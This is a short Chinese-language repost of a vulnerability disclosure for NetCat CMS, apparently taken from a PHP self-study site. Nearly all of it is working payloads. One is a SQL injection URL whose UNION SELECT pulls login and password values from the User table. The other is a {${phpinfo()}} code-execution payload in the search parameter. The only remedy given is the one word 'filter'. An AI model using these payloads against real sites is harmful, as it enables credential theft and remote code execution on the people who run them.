标题: NetCat CMS Code exec, SQL-injection
作者: brain[pillow]
官网: http://netcat.ru/
该缺陷对本cms个版本均有效:
=======================================================
# Sql注射:
HdhCmsTest2cto测试数据 /search/?action=index&text=q')+union+select+1,1,concat_ws(0x3a,login,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+User%23
=======================================================
# 代码执行:
/search/?action=index&text={${phpinfo()}}
修复:过滤
查看更多关于NetCat CMS多重缺陷及修复 - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11381